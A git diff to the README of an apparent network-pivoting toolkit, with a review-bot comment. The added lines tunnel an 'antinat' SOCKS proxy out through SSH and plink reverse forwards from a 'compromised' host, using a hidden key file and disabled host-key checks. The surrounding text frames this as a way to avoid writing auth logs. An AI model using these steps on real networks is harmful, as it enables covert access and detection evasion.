diff --git a/Readme.md b/Readme.md index 8a5fefe..8aea6b7 100644 --- a/Readme.md +++ b/Readme.md @@ -38,22 +38,30 @@ ssh -D 0.0.0.0:8080 compromiseduser@127.0.0.1 -p 2222 -fNT We can combine the `antinat` proxy with the above procedure in order not to login onn the ssh server and thus writing on the auth logs. Instead of using with the socks options, upload the provided package and directly forward the `antinat` port. +``` +./antinat -cantinat.xml +ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -L 0.0.0.0:32768:127.0.0.1:32768 -i /tmp/.keyfile -fNT targetname@myserver + +``` + ## Windows -Upload the package and extract it with 7z.exe. +Upload the package and extract it. -Start the antinat binary, no admin permissions are required: +Start the `antinat` binary, no admin permissions are required: ``` -antinat.exe -a -cantinat.xml +antinat.exe -a -cC:\temp\antinat.xml ``` -Forward the antinat port with plink: +Forward the antinat port with `plink`: ``` -plink -ssh -noagent -pw "password" -L 32768:127.0.0.1:8080 targetname@myserver +echo y | plink -ssh -noagent -pw "wrongpassword" targetname@myserver +plink -ssh -noagent -C -T -N -pw "password" -R 0.0.0.0:32768:127.0.0.1:8080 targetname@myserver ``` +Putty natively supports SSH via HTTP and so does plink but it can only work via cli if a preconfigured session already exist. [More info](https://superuser.com/questions/963563/is-it-possible-to-load-putty-connection-information-session-from-file). ## Tips diff --git a/windows/Readme.txt b/windows/Readme.txt deleted file mode 100644 index 10d5970..0000000 --- a/windows/Readme.txt +++ /dev/null @@ -1 +0,0 @@ -TODO corkscrew
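Review bot: Host key verification is switched off in both new examples in the Readme.md hunk, and the README never says so. The Linux command passes `-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no`, and the added `echo y | plink -ssh -noagent -pw "wrongpassword" targetname@myserver` line appears to exist only to answer the host key prompt, so neither connection confirms that `myserver` is the intended host. Add a sentence explaining the throwaway `plink` call, and prefer pinning the server key (a pre-populated known_hosts file, or plink's `-hostkey` option) over blanket acceptance. The two examples also disagree: Linux uses `-L 0.0.0.0:32768:127.0.0.1:32768`, while Windows changes from `-L 32768:127.0.0.1:8080` to `-R 0.0.0.0:32768:127.0.0.1:8080`. Please state which port `antinat.xml` listens on and on which host each listener is expected to bind. Both commands bind `0.0.0.0`, which exposes the forwarded port on every interface (and for `-R` only takes effect if the server allows GatewayPorts); `127.0.0.1` would be the safer documented default. Minor: there is a stray blank line before the closing fence of the new Linux block, and the last added sentence should read "PuTTY" and "already exists".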